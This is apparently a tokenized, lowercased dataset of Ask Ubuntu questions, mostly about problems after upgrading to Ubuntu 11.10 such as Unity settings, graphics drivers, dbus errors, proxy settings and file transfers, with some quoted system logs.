66461	how can i return to the theme and logo of ubuntu 11.10 without uninstalling edubuntu 11.10 ?	the `` home '' icon in the unity dock was set to the edubuntu logo when i upgraded from ubuntu 11.04 to 11.10 . how can i return to the theme and logo of ubuntu without uninstalling the newly installed packages for edubuntu on ubuntu 11.10 ?
66464	how do i set up deja dup to use encryption ?	i noticed deja dup is featured heavily as the default backup tool in ubuntu 11.10 . it looks pretty good , and i noticed elsewhere that it seems to support encryption as well . however , the default version in 11.10 seems to have a slightly different interface and does not appear to list any encryption options . am i missing something ? why does n't the 11.10-default version support encryption ?
66465	how to create a distro with ubuntu as base with preinstalled apps , themes and restricted extras ?	i wanted to give my friends a taste of ubuntu , but they are unwilling to download all these packages online . so how can i create an iso with oneiric as base with all the other essentials ? i will not brand it . and i 've tried pinguy and mint . i do n't like them either .
66466	dbus error while boot after upgrade to 11.10	after upgrading to oneiric , ubuntu appears to be unable to start dbus correctly , which virtually renders half the system unusable . the startup error seems to happen rather early in the bootstages - and i have not yet figured out where exactly , or even what actually causes it . i 've tried to run dbus manually ( sudo service dbus start ) , but no avail . i 'm really not sure what could be done . what are my options ? do i have to reinstall ubuntu ( my /home is not going to be affected , as it 's a partion ) ?
66470	persistent 3g connection with network manager fails	i maintain a persistent 3g connection on a remote device using network manager . however , every so often , the link fails and then does not restart itself . i managed to identify an occurrence of this in my syslog , but honestly i 'm not really sure what i 'm looking at . it seems that the machine thinks the device has been unplugged , but there 's no corresponding log entry for it actually being unplugged . would someone mind looking at the below syslog snip and guiding me in the right direction ? oct 13 22:25:26 tracker pppd [ 1091 ] : lcp terminated by peer oct 13 22:25:26 tracker pppd [ 1091 ] : connect time 206.7 minutes . oct 13 22:25:26 tracker pppd [ 1091 ] : sent 203306 bytes , received 182777 bytes . oct 13 22:25:26 tracker pppd [ 1091 ] : modem hangup oct 13 22:25:26 tracker pppd [ 1091 ] : connection terminated . oct 13 22:25:26 tracker networkmanager [ 333 ] : < info > ( ttyusb1 ) : device state change : 8 - > 9 ( reason 13 ) oct 13 22:25:26 tracker networkmanager [ 333 ] : < info > unmanaged device found ; state connected forced . ( see http : //bugs.launchpad.net/bugs/191889 ) oct 13 22:25:26 tracker networkmanager [ 333 ] : < warn > activation ( ttyusb1 ) failed . oct 13 22:25:26 tracker modem-manager [ 337 ] : < info > ( ttyusb1 ) closing serial port ... oct 13 22:25:26 tracker networkmanager [ 333 ] : < info > ( ttyusb1 ) : device state change : 9 - > 3 ( reason 0 ) oct 13 22:25:26 tracker networkmanager [ 333 ] : < info > ( ttyusb1 ) : deactivating device ( reason : 0 ) . oct 13 22:25:26 tracker kernel : [ 12441.840088 ] ata1.00 : exception emask 0x0 sact 0x0 serr 0x0 action 0x6 oct 13 22:25:26 tracker kernel : [ 12441.846744 ] ata1.00 : bmdma stat 0x66 oct 13 22:25:26 tracker kernel : [ 12441.850446 ] ata1.00 : failed command : write dma oct 13 22:25:26 tracker kernel : [ 12441.855020 ] ata1.00 : cmd ca/00:02 : c4 : fb:5b/00:00:00:00:00/e0 tag 0 dma 1024 out oct 13 22:25:26 tracker kernel : [ 12441.855024 ] res 51/84:00 : c4 : fb:5b/00:00:00:00:00/e0 emask 0x30 ( host bus error ) oct 13 22:25:26 tracker kernel : [ 12441.870623 ] ata1.00 : status : { drdy err } oct 13 22:25:26 tracker kernel : [ 12441.874708 ] ata1.00 : error : { icrc abrt } oct 13 22:25:26 tracker kernel : [ 12441.878820 ] ata1 : soft resetting link oct 13 22:25:26 tracker modem-manager [ 337 ] : < info > ( ttyusb1 ) serial port closed oct 13 22:25:26 tracker modem-manager [ 337 ] : < info > modem /org/freedesktop/modemmanager/modems/0 : state changed ( connected - > disconnecting ) oct 13 22:25:26 tracker modem-manager [ 337 ] : < info > modem /org/freedesktop/modemmanager/modems/0 : state changed ( disconnecting - > connected ) oct 13 22:25:26 tracker networkmanager [ 333 ] : < warn > could not read ppp stats : no such device oct 13 22:25:26 tracker pppd [ 1091 ] : exit . oct 13 22:25:26 tracker networkmanager [ 333 ] : < info > unmanaged device found ; state connected forced . ( see http : //bugs.launchpad.net/bugs/191889 ) oct 13 22:25:26 tracker networkmanager [ 333 ] : scplugin-ifupdown : devices removed ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) oct 13 22:25:26 tracker networkmanager [ 333 ] : < info > disconnect failed : ( 32 ) the serial port is not open . oct 13 22:25:27 tracker kernel : [ 12442.048218 ] ata1.00 : configured for udma/100 oct 13 22:25:27 tracker kernel : [ 12442.048241 ] ata1 : eh complete oct 13 22:25:27 tracker kernel : [ 12442.050941 ] ata1.00 : exception emask 0x0 sact 0x0 serr 0x0 action 0x6 oct 13 22:25:27 tracker kernel : [ 12442.057483 ] ata1.00 : bmdma stat 0x66 oct 13 22:25:27 tracker kernel : [ 12442.061153 ] ata1.00 : failed command : write dma oct 13 22:25:27 tracker kernel : [ 12442.065696 ] ata1.00 : cmd ca/00:02 : c4 : fb:5b/00:00:00:00:00/e0 tag 0 dma 1024 out oct 13 22:25:27 tracker kernel : [ 12442.065699 ] res 51/84:00 : c4 : fb:5b/00:00:00:00:00/e0 emask 0x30 ( host bus error ) oct 13 22:25:27 tracker kernel : [ 12442.081273 ] ata1.00 : status : { drdy err } oct 13 22:25:27 tracker kernel : [ 12442.085366 ] ata1.00 : error : { icrc abrt } oct 13 22:25:27 tracker kernel : [ 12442.089488 ] ata1 : soft resetting link oct 13 22:25:27 tracker kernel : [ 12442.260206 ] ata1.00 : configured for udma/100 oct 13 22:25:27 tracker kernel : [ 12442.260226 ] ata1 : eh complete oct 13 22:25:27 tracker kernel : [ 12442.268296 ] ata1.00 : exception emask 0x0 sact 0x0 serr 0x0 action 0x6 oct 13 22:25:27 tracker kernel : [ 12442.274829 ] ata1.00 : bmdma stat 0x66 oct 13 22:25:27 tracker kernel : [ 12442.278480 ] ata1.00 : failed command : write dma oct 13 22:25:27 tracker kernel : [ 12442.283022 ] ata1.00 : cmd ca/00:02 : c4 : fb:5b/00:00:00:00:00/e0 tag 0 dma 1024 out oct 13 22:25:27 tracker kernel : [ 12442.283026 ] res 51/84:00 : c4 : fb:5b/00:00:00:00:00/e0 emask 0x30 ( host bus error ) oct 13 22:25:27 tracker kernel : [ 12442.298605 ] ata1.00 : status : { drdy err } oct 13 22:25:27 tracker kernel : [ 12442.302693 ] ata1.00 : error : { icrc abrt } oct 13 22:25:27 tracker kernel : [ 12442.306763 ] ata1 : soft resetting link oct 13 22:25:27 tracker kernel : [ 12442.476225 ] ata1.00 : configured for udma/100 oct 13 22:25:27 tracker kernel : [ 12442.476248 ] ata1 : eh complete oct 13 22:25:29 tracker networkmanager [ 333 ] : < info > activation ( ttyusb1 ) starting connection 'cdma' oct 13 22:25:29 tracker networkmanager [ 333 ] : < info > ( ttyusb1 ) : device state change : 3 - > 4 ( reason 0 ) oct 13 22:25:29 tracker networkmanager [ 333 ] : < info > unmanaged device found ; state connected forced . ( see http : //bugs.launchpad.net/bugs/191889 ) oct 13 22:25:29 tracker networkmanager [ 333 ] : < info > activation ( ttyusb1 ) stage 1 of 5 ( device prepare ) scheduled ... oct 13 22:25:29 tracker networkmanager [ 333 ] : < info > activation ( ttyusb1 ) stage 1 of 5 ( device prepare ) started ... oct 13 22:25:29 tracker networkmanager [ 333 ] : < info > activation ( ttyusb1 ) stage 1 of 5 ( device prepare ) complete . oct 13 22:25:30 tracker modem-manager [ 337 ] : < info > modem /org/freedesktop/modemmanager/modems/0 : state changed ( connected - > registered ) oct 13 22:25:30 tracker modem-manager [ 337 ] : < info > modem /org/freedesktop/modemmanager/modems/0 : state changed ( registered - > connecting ) oct 13 22:25:30 tracker modem-manager [ 337 ] : < info > modem /org/freedesktop/modemmanager/modems/0 : state changed ( connecting - > registered ) oct 13 22:25:30 tracker networkmanager [ 333 ] : < warn > cdma connection failed : ( 32 ) sending command failed : device is not enabled oct 13 22:25:30 tracker networkmanager [ 333 ] : < info > ( ttyusb1 ) : device state change : 4 - > 9 ( reason 0 ) oct 13 22:25:30 tracker networkmanager [ 333 ] : < info > unmanaged device found ; state connected forced . ( see http : //bugs.launchpad.net/bugs/191889 ) oct 13 22:25:30 tracker networkmanager [ 333 ] : < info > marking connection 'cdma ' invalid . oct 13 22:25:30 tracker networkmanager [ 333 ] : < warn > activation ( ttyusb1 ) failed . oct 13 22:25:30 tracker networkmanager [ 333 ] : < info > ( ttyusb1 ) : device state change : 9 - > 3 ( reason 0 ) oct 13 22:25:30 tracker networkmanager [ 333 ] : < info > ( ttyusb1 ) : deactivating device ( reason : 0 ) . oct 13 22:25:30 tracker networkmanager [ 333 ] : < info > unmanaged device found ; state connected forced . ( see http : //bugs.launchpad.net/bugs/191889 )
66476	how to attach the unity menu applet to the gnome panel ?	can someone please tell how to attach the unity menu applet back to the gnome panel ?
66478	how to remove menu bar	how can i remove one of the menu bars on the desktop in classical mode ? i just updated to ubuntu 11.10 , logged in with the classic gui , and i can not right click on the menu bars .
66479	how can i set the launcher to open by putting the mouse in the top left corner ?	in natty you could instantly open the app bar by putting the mouse in the top left corner of the screen . now you need to place your mouse to the left of the screen and wait . how can i get the old setting back ?
66482	ca n't login after installing 11.10	this computer has had ubuntu on it for quite some time , and after several upgrades , the os started getting a little creaky . i decided to reinstall , but i wanted to keep my files , which was easy because /home was in a different partition . during the installation , i chose to reformat my / partition , and use ( but not format ) my /home partition . i also ended up changing my password to something more secure . the install seemed to go ok , so i rebooted into the system . i was presented with the new login screen , which i filled out and tried to log in . the screen flashed to black , sometimes showing a virtual terminal , and then put me back to the login screen . this happens regardless of whether i choose the `` ubuntu '' or `` ubuntu 2d '' session . i switched to a virtual terminal and was able to login , but found my home directory empty , save two files telling me how to decrypt my drives . i ran the decryption command , and my files showed up . i assume because my password changed , this no longer happens automatically . i 'm running an ati radeon hd 5830 card on a 64-bit processor . tl ; dr : i can no longer login to my computer . my home directory no longer decrypts automatically .
66484	can i start gnome sushi previews in the centre of my screen ?	i have sushi installed in ubuntu 11.10 unity interface . when i press the space bar on a video file , the preview always starts at the very left of my monitor . can i make it centered without moving it all the time ? i have tried place windows in compiz but it does n't work .
66489	is there a way to enable smooth scrolling for pdfs ?	there is one small issue with ubuntu that is driving me crazy . smooth scrolling when reading documents pdf 's is n't smooth . i was using evince to read pdf 's bigger books 200+ pages . the slightest movement results in a major movement of many pages . so i blamed evince and the installed xpdf but no its the same thing . is there anything i can install/fix to allow something scrolling when i read documents ? in lxde or kde the pdf viewer has the little up and down scroll arrows in the bottom right corner . is there anyway to enable these for laptops so we are n't `` pulling '' at the documents and can scroll odf 's smoothly on laptop 's ?
66491	how can i change the color of the sidebar in nautilus 3.2.0 ?	this used to be easy to do with a .gtkrc-2.0 in ubuntu 11.04 and previous releases . i am using a third-party theme ( elements ) and i really like it , but the nautilus sidebar is ugly and dark and i want it to match the rest of the theme a little better .
66492	scp copy over ssh does n't work - permission denied error , please ?	it 's driving me nuts ! i just want to transfer one simple file from laptop to server . i 'm using ubuntu on both machines . so i have : -rwxr-xr-x 1 sandro 414622 2011-10-14 23:42 sandrophoto-html.tar.gz and i 'm sending it using : sudo scp -p xxxx sandrophoto-html.tar.gz usern @ server.local : /media/xx/xx/xx and i get : scp : /media/xx/xx/xx/sandrophoto-html.tar.gz : permission denied p.s . i might be doing this other way around - i want to send file tar.gz that is located on my desktop , to remote server into the folder /media/yadayda
66498	setting tex live path for root	i have installed tex live 2011 vanilla and i have trouble setting the tex live path for root ( in ubuntu 11.10 ) . the problem is that when i run sudo tlmgr i get : sudo : tlmgr : command not found to fix the path for non-root it was sufficient to add path=/usr/local/texlive/2011/bin/x86_64-linux : $ path to /etc/profile . i have tried adding this same line to /root/.bashrc and i have also tried to add it to /etc/profile.d/zzz-texlive.sh like herbert suggest in http : //tex.stackexchange.com/questions/26624/tlmgr-inaccessible/26626 # 26626 but it does not help .
66501	i ruined my laptop . any chance to restore the data ?	i 'm a newbie . i tried to make a dual boot ( win7 x64+ubuntu ) . i used gparted ( live ubuntu 11.10 usb ) to move my storage drive . everything was going well . however , after about 10 mins , gparted froze . i waited for 20 mins - nothing changed . i restarted my laptop . afterwards i got a message - something like : no os recognized . then i booted the live usb again and to my surprise i saw that my storage partition has been made into a swap file ( about 400 gb ) my windows partition was intact . i installed gpart and afterwards testdisk . i am scanning my drive with testdisk at the moment . do i have any chances to revert the partitioning of my storage drive and recover my data ? am i doing it right ?
66504	how do i install the experimental nvidia open-source drivers ?	during the ubuntu 11.10 beta 1 there were experimental nvidia open source drivers . i liked them a lot more than the proprietary ones because they let me use the native dual-screen settings from ubuntu , instead of nvidias ones which trick ubuntu into thinking i have one massive screen instead of two regular ones . they were removed from the final release ( i think ) . does anyone know what i 'm talking about and whether there is a way to get them back ?
66506	reduce download size and time when updating package repositories	this question comes from 2 different scenarios but have the same question in common : scenario 1 - when a user wants to upgrade several pcs that are not in the same network ( not on the same lan ) or in different places ( like work , home , friend 's home ... connected via a vpn or just internet ) or in the worst cases do not have access to the internet at all . in this cases i typically update my pc with the latest and then go to /var/cache/apt/archives to copy all .deb packages and put them in a pen drive . i then go to any/every other pcs and copy this content to one of the other pcs var/cache/apt/archives folder to save them time from having to download the exact same stuff or at least the common packages between pcs . this saves , in my case sometimes hours of waiting for an update/upgrade in all of this case scenarios , although it involves me having to move around . scenario 2 - slow connections still exist . a couple of versions ago , there was not problems when doing an repository update , but it is known that some versions ago , the downloadable content to update the repositories grew.. a lot . in past versions it took a small amount of time to at least update the repositories . nowadays it takes way more even with the same internet speed . this affects all users , but specially the ones with dsl connections or slower . so my questions go in this order of importance ( taking into consideration users from both scenarios ) : is there any way to reduce size and time when doing a repository update ? . are there any tools that could somehow cache or use multiple connections to speed up repository updates ( like apt-fast ) ? is there any talk for 12.04+ about any modifications to package compression , repository bandwidth or repository management in regards to optimizing speed for repository updates ? is there a way to only detected the delta from packages and download the difference ?
66511	mouse cursor wo n't appear on boot	it 's still there , but it 's invisible ! logging out makes it appear again , but logging out and back in after each boot is quite a nuisance . any ideas ? switching to unity 2d seems to make the cursor appear when it 's on the sidebar and topbar , but not when it 's on the wallpaper or any applications also it appears that only the default pointer arrow cursor is n't showing : the hourglass cursor or finger cursors appear just fine ! > : o tried changing the cursor theme following this guide - http : //www.youtube.com/watch ? v=2hu9jrdsxb8 - and even though the theme changed successfully , the default-state pointer is still invisble expect when on the side/topbar ... having made a fresh install , the problem persists > : [
66517	why service munin-node does not run at start up ( reboot ) ?	i have a vps instance running ubuntu server version 10.04 lts ( lucid lynx ) . i have installed munin and munin-node . it is properly configured . it is working fine . the problem is that i need to run the command sudo service munin-node start for it to start . if i reboot the system ( either with sudo reboot now or using a web-based control panel ) , this service does not start . i need to run the command above for it to start . i tried `` everything '' to troubleshoot , with no success . 1 ) it should simply start as many other programs i installed in this vps using aptitude ( proftpd , nginx , mysql , monit , icecast , postfix , and lots of others ) . it does not . 2 ) i tried adding service munin-node start at /etc/rc.local as i have successfully done to start another service . it does not start ! 3 ) i ran the command update-rc.d munin-node defaults . it sounded like everything was ok ! after a reboot ... it does not start ! 4 ) i ran grep -r munin * to see everything munin-related at /var/log in my few years as sys admin , i have never been so clueless like this time . what is really impressive is that a simple service munin-node start ( or equivalent ) once the system is up and running ... and the service starts normally . ideas ? suggestions ? i am about to try this tip from another question , if everything else fails ...
66520	how to downgrade 11.10 to 11.04 ?	i want my 11.04 back . is it possible to do that ? or do i need to reinstall everything and start from scratch again ? or maybe there is some recovery option somewhere ?
66524	why ca n't i make a file association in nautilus ?	after upgrading to 11.10 , the association i had created to open sgf files with an application called quarry is lost . if i select right-button- > properties- > open with ... on an sgf file , quarry is not listed , but it appears in the right-button- > open with ... menu . what 's going on here ? by the way , i tried `` mimeopen whatever.sgf '' and it works . so mime-types associations are ok , but something is broken in nautilus it seems ... for example : % mimeopen kogo.sgf please choose a default application for files of type application/x-go-sgf 1 ) quarry ( quarry ) 2 ) notepad ( wine-extension-txt ) 3 ) gvim text editor ( gvim ) 4 ) gedit ( gedit ) 5 ) abiword ( abiword ) 6 ) other ... as you can see , quarry is properly detected . but in the properties- > open with dialog in nautilus , quarry is not availaible . and because in 11.10 nautilus does n't longer provides the option to add a custom command to open an application , i have no way to add a file association .
66527	where to find administration , preferences , etc ?	where can i find it ? and also , how can i add folder or file to the left menu ? thank you .
66528	task switcher not showing terminal windows	updated to 11.10 this morning . terminal windows stopped showing in the alt+tab switcher . other having the same problem ? any explanation ? thanks
66529	how can i get my bluetooth adapter working on a toshiba satellite m645 ?	i just recently installed ubuntu desktop 11.10 on my laptop . the laptop is a toshiba satellite m645 . it does not have a bluetooth radio in it so i plugged in an io gear usb bluetooth adapter . the model is gbu421 and upon further inquiry i found out that the radio is a broadcomm bcm2046b1 . i have discovered that lsusb shows the radio as being found in the computer - but the gnome bluetooth manager says that there is nothing there . so i am guessing it is a problem with gnome bluetooth manager not with linux in general . is there anything i can try in order to make this work ?
66530	how do i install on a dell inspirion 1501 ?	i believe i need to add pci=nomsi but i do n't know what to edit to get my computer to boot ubuntu .
66533	how can i restore configuration files ?	i would like to restore lightdm to its default state , because for some reason /etc/lightdm/unity-greeter.conf is now an empty file . deleting /etc/lightdm/unity-greeter.conf and then running sudo apt-get install -- reinstall unity-greeter does n't create a new config file as you might expect . how can i restore a missing config file ?
66538	why when i run gedit ca n't i change the theme ?	when i run gedit as a regular user i do n't get the menubar that lets me change preferences . but when i run gedit from the command line ( gksudo gedit ) then i get the menubar that allows me to use edit- > preferences- > font & colors , etc . but when i just run gedit from the command line without the gksudo part , i do n't get the menubar at all . how can i run gedit as myself and get the menubar ? thanks in advance .
66541	align window buttons to the right in gnome fallback mode ?	there have been many a question on how to do it with gconf-editor in < 11.10 , but how can i align the window buttons ( close , minimize and maximize ) to the right in ubuntu 11.10 ? please close if it 's a duplicate . i searched around but could n't find anything . i 'm in the gnome-session-fallback wm .
66543	change icon size in unity 2d launcher	is it possible to change the icon sizes of the buttons in the launcher used in unity 2d ?
66548	what 's the difference between the nvidia-current , and nvidia-current-updates packages ?	what 's the difference between the nvidia-current , and nvidia-current-updates packages ? the former has a higher version number , and the description of the packages are the same . which do i use ? which is the most recent one what 's the purpose of this split packaging ?
66550	why does dash get hidden below other windows after a while ?	after a while of usage , unity dash gets hidden below the other windows . it works , but it 's just hidden . is this behavior intentional and if so , is there any way of disabling it ?
66551	vga out video is wavy and unreadable with a ati radeon x1200	trying to get stable output when using monitor attached to vga port on gateway netbook running lucid lynx 10.04lts . monitor video is wavy and unreadable . video card is an ati radeon x1200 . current lcd resolution is set to 1280 x 768 . refresh is set to 0 and ca n't be changed . no other selectable resolution options are offered .
66552	add on animations for compiz config ? how can i get them ?	how can i get the add-on animations for the compizconfig settings manager for ubuntu 11.10 ?
66554	why is google chrome ignoring my proxy settings ?	i just installed ubuntu 11.10 in my laptop.the network i am connected to uses a proxy server . i adjusted the proxy settings in system settings- > network- > network proxy . i applied them system wide , but in google chrome it is not working . i am unable to browse although i can access the internet through mozilla firefox where i set up the proxy manually . can any one tell me what the problem is ? how i can correct it ?
66555	am i able to pin files to the launcher ?	i am working on a project , and i 'd like to be able to pin it to the launcher ( as opposed to pinning the app to open it ) . so , if possible , show me how , and if not , well , you know what to do . help is appreciated . ps : i 'm using 11.10
66557	just upgraded to 11.10 - how do i disable unity ?	forgot about unity . apparently not as easy to disable as last time .
66559	are there any 2d alternatives to unity ?	i 'm just wondering if there are any 2d alternatives to unity ( excluding kde , xfce , lxde , etc . ) that have a modern look to them . i like unity ( since i 'm newer to ubuntu ) but i just think an alternative would be cool . replies would be appreciated . ps : my computer is a few years old and only has 2d acceleration .
66563	davmail java terminates with sigsegv after 11.10 upgrade	one of my favorite programs , davmail , crashes now after upgrading to 11.10 . just checking if there is a quick fix before i submit a bug report . thanks . $ davmail # # a fatal error has been detected by the java runtime environment : # # sigsegv ( 0xb ) at pc=0x00007ff9e08d46b0 , pid=7998 , tid=140711267337984 # # jre version : 6.0_23-b23 # java vm : openjdk 64-bit server vm ( 20.0-b11 mixed mode linux-amd64 compressed oops ) # derivative : icedtea6 1.11pre # distribution : ubuntu oneiric ( development branch ) , package 6b23~pre10-0ubuntu5 # problematic frame : # c [ libdbus-1.so.3+0x246b0 ] [ error occurred during error reporting ( printing problematic frame ) , id 0xb ] # an error report file with more information is saved as : # /home/pcm/hs_err_pid7998.log gconf error : configuration server could n't be contacted : d-bus error : did not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken .
66564	can i burn the ubuntu iso cd image onto a dvd to install it ?	i downloaded ubuntu 11.10 and i want to burn it but i do n't have a cd i only have dvds , can i burn it on a dvd and install it ? cause i 've googled it and some people said that it 's not working but with older versions
66566	how can i speed up my old computer ?	i run ubuntu on an old dell dimension 2400 ( with only 2d accel . ) and it runs really slow when opening up certain programs , like the ubuntu software center . so i was just wondering if there is any software that can speed it up . any response at all is appreciated .
66579	where are my tray icons in the unity 2d panel ?	i can not see any icons in the notification area . i am using unity 2d in ubuntu 11.10 . where are they ?
66582	no additional drivers for ati radeon x300 on a dell inspiron 6000	just installed ubuntu 11.10 on my 6year old dell inspiron 6000 laptop . i do not see any additional drivers for my ati radeon x300 card . i would like to upgrade to ati proprietary ( in my case legacy ) driver . how do i do it ? thanks a ton in advance .
66588	is there a way i can completely disable workspaces and remove the icon from my unity-2d panel ?	my system is built around my 71 year old father ( who is a recent , and very supportive linux user now ) . he does n't have any need for multiple desktops and i find that having too many things on the panel can be a bit confusing for him . is there any way to completely disable workspaces / as well as remove the icon from the panel ?
66589	can i remove the launcher tooltip delay ?	ubuntu 11.10 provides a small delay for displaying the tool-tip when hovering over items in the launcher . this , oddly enough , gives the impression of a sluggish desktop . is there anyway to disable this ? i ca n't seem to find any option to do so in ccsm . relevant bug report : https : //bugs.launchpad.net/ubuntu/+source/unity/+bug/804021
66590	how do i stop x server ?	so it looks like i need to install nvidia manually , and to do so , i need to stop the x server completely . after pressing [ ctrl ] + [ alt ] + [ f1 ] , i tried this command at the prompt : sudo service gdm stop ... but all i get is `` unknown service : '' and the nvidia install script wo n't run . this also does n't work : sudo gdm stop it just takes me a login screen . how can i completely kill x in 11.04 ?
66591	nautilus desktop folder menu bar and folders show up on secondary screen	i have two screens and i installed gnome shell in my fresh 11.10. but for some reason the nautilus menus for the desktop forder apears in my secondary screen . this never happened in my fedora 15 , do n't know if it is a gnome 3.2 bug or a ubuntu problem i 've managed to disable it by making nautilus no handle the desktop via the gnome-tweak-tool . but that way o loose the capability to have icons on desktop . any ideas on how can i fix it , without disabling the gnome-tweak-tool option ? ?
66594	why does n't the software center resume downloading packages when it is interrupted ?	i wonder if there is a tool that can resume broken downloads when the ubuntu software center is downloading packages for software it features or shows . for example i was downloading skype and by the time i had downloaded 12mb , the net link broke . again i went to the software center and then began downloading skype from the start . so is there anything which can resume downloads that are interrupted ?
66595	why does n't unity retain my compiz settings ?	i installed compizconfig settings manager in ubuntu 11.10 . changes made to settings ( for example key bindings ) work perfectly , but the changes are not applied when i reboot . i have to run compiz -- replace to re-enable my key bindings . anyone have any ideas ?
66597	nautilus-open-terminal on 11.10 kills nautilus	after i installed nautilus-open-terminal , when i clicked the icon on unity panel to open my /home folder , the folder just stayed there for no more than 10 sec and then disappered . so i removed it , and it is ok now . but the language input icon disappered , and i used unity -- reset . is this a bug ?
66598	flash video does n't work after upgrade to 11.10	i 've found that after upgrading to 11.10 ( 32 bit ) , i can no longer watch streaming flash video on sites such as ustream or justin.tv . i 've spent the last several hours installing this package and uninstalling that package , and purging everything flash-related and starting over , to no avail . i was curious if anybody else has run into similar issues and found a fix . i 'm running an nvidia card , and i 've tried both sets of drivers available .
66601	why did all my custom gedit themes and language specs disappear after the 11.10 upgrade ?	i recently upgraded to 11.10 on my desktop , but afterward all the custom themes i added and the mediawiki syntax highlighting were gone . for the themes , i forget where i put the files , but the syntax highlighting was downloaded according to the author 's instructions so it is still at ~/.local/share/gtksourceview-2.0/language-specs/ what gives ? i tried removing the files/directory and starting over , tried moving the directory to ~/usr/share ... instead , tried restarting , tried updating my packages . no luck .
66603	gnome top panel discolored when running fglrx	i installed gnome-shell on ubuntu 11.10 and the top bar has a strange glitch : i also installed ati/amd proprietary fglrx graphics drivers but the `` post-release updates '' fails to install .
66604	how do i log into the classic gnome interface ?	it seems that the user can not log into the original classic interface in ubuntu 11.10 . i have to use the unity desktop .
66606	fails to boot after upgrade , stuck on winbind package	i started the upgrade from 11.04 to 11.10 last night . once it got the installing packages part i left the computer unattended the rest of the night . when i checked it this morning the screen was blank and i could n't get it to turn on . so i cycled power , and now i get the `` ubuntu 11.10 '' screen with the dots underneath , but then it gets to a blank screen and nothing more . i can get to the command line in recovery mode ; here 's a list of the things i 've tried so far sudo apt-get update - the very first repository it checked sat at 0 % for a long time ( network cable is plugged in ) , so i cancelled with ctrl+c thought it might be a problem with display drivers , so i tried sudo apt-get install nvidia-glx - this gave me an error saying dpkg has been interrupted , manually run sudo dpkg -- configure -a sudo dpkg -- configure -a this installed / updated a bunch of stuff but got stuck at starting winbind daemon winbind restarted and tried sudo dpkg -- configure -a again but it gets stuck at same windbind step what else can i do to fix this problem ?
66609	bookmark searches with dash ?	is there any way to configure dash to search/access firefox bookmarks , too ? seems like it would completely replace gnome do for most things if it could do this one thing . gnome do keeps causing errors with the login keyring , so i 've given up on using it , but i miss being able to access my favorite bookmarks with just a few keystrokes .
66611	how to add wanda ( the fish ) to the gnome shell panel ?	how do you add wanda ( the fish ) to the gnome shell panel , or to the launcher , and have it display fortune ? i want my fish back . i already have fortune ; i can just type into the terminal fortune and it works , but i want to add it to the left panel , using gnome shell .
66615	how to share internet from one network card to another ethernet port	i basically seek a way to `` bridge '' the internet connection coming into my linux machine through one ethernet port ( on the mother board 's nic ) and share it with another computer connected to a separate ethernet port ( on a nic using pci ) . in doing this , i hope to enable both computers to have internet access , using just one available internet connection . any ideas ? the common answer of `` stop being cheap , just buy a router '' wo n't work since it 's for 2 school computer for which that is n't an option . neither computer has wi-fi either .
66616	outputting to external display only : ati radeon hd6310 driver issues on a thinkpad x120e	the open driver applied in ubuntu 11.10 by default for ati 's radeon hd 6310 works fairly well . it detects my secondary display , the resolutions for both it and built in display [ thinkpad x120e ] , and maps them fairly well with limited overlap . users , however , are given two options from the 'additional drivers ' dialogue : ati/amd proprietary fglrx graphics driver ( post-release updates ) ati/amd proprietary fglrx graphics driver the former can not be installed . the latter can , but once installed garbles bootscreen dimensions , and no longer detects displays . when implemented with gnome-shell rather than unity , titlebar colors are distorted , and gnome-shell glitches between it and the underlying `` fallback '' environment , live . removal of the proprietary driver causes complete removal of gnome-shell and corruption of unity and unity-2d . gnome-fallback works in limited capacity . the third party driver from ati 's web page , installed with default options , does not seem to work . all i really want to do is output to external display only . which driver i use does n't matter , although the catalyst stuff would probably be best for the promise of increased performance . any thoughts/feedback ?
66617	how do i use plasma widgets in unity ?	i have already read does unity have any widgets ? and the article on omgubuntu but apt-get and synaptic can not find plasma-desktop and they give an error : the following packages have unmet dependencies : plasma-scriptengine-python : depends : python-qt4-dbus ( > = 4.8.3-3~ ) but it is not installable e : unable to correct problems , you have held broken packages . i am really wanting to get a plasma desktop but i am unsure of how to continue .
66618	thunderbird issue with proxy authentication	i was setting up thunderbird at home with wired internet connection , and everything was fine . however when i tried getting new mails using college wireless which requires proxy with authentication , after typed my username and password , thunderbird status bar showed some progress , then i received this error : could not connect to mail server abcd @ abcd.com , the connection was refused . ironically , i still be able to open tab for browsing some addons , but could not able to download them . i assumed since firefox works so well under proxy ( to both thunderbird and ff , i used the setting in edit - > pref - > advance - > network tab - > connection ) , thunderbird would conduct the same and work fine . i 'm currently using ubuntu oneiric .
66620	how do i install opera ?	i have installed ubuntu 11.10 beta version . now i wanted to install opera and i downloaded the .deb package , but it wont work . i also tried the package to open it with ubuntu software center but the usc crashed . tell me how to proceed ?
66622	is is possible to change the icon of a particular folder ?	is is possible to change the icon of a particular folder ( like in ms windows xp , etc ) , so that it is easily identifiable and strikingly visible . please advise me .
66624	how do i get sensors-applet working ?	i used to have lm-sensors and sensors-applet working correctly on ubuntu 11.04 . i just updated to ubuntu 11.10 , and lm-sensors is installed , but sensors-applet does not seem to be in the repository any more . is there a way to still have it working ?
66628	quitting braid causes dual monitors to switch to mirror mode	i have 2 monitors in my desktop . the one has a smaller resolution than the other ( do n't know if it matters for this issue ) . from display i have disabled mirroring , so the first monitor continues to the other . today i installed braid . when i launch it , it goes fullscreen . when i quit the game , the setting have reverted to the mirroring of monitors ( and with the smaller resolution ) , and i have to set them up each time . is there a solution for that ? the gpu is sapphire radeon hd 3870 , have n't install any extra drivers for the gpu , 64bit cpu , using gnome-shell the output of xrandr $ xrandr screen 0 : minimum 320 x 200 , current 2464 x 900 , maximum 8192 x 8192 dvi-0 connected 1024x768+0+0 ( normal left inverted right x axis y axis ) 304mm x 228mm 1024x768 60.0*+ 75.1 75.0 70.1 832x624 74.6 800x600 75.0 60.3 56.2 640x480 75.0 66.7 60.0 59.9 720x400 70.1 din disconnected ( normal left inverted right x axis y axis ) dvi-1 connected 1440x900+1024+0 ( normal left inverted right x axis y axis ) 410mm x 257mm 1440x900 59.9*+ 75.0 1280x1024 75.0 60.0 1280x960 60.0 1152x864 75.0 1024x768 75.1 70.1 60.0 832x624 74.6 800x600 72.2 75.0 60.3 56.2 640x480 72.8 75.0 66.7 60.0 720x400 70.1
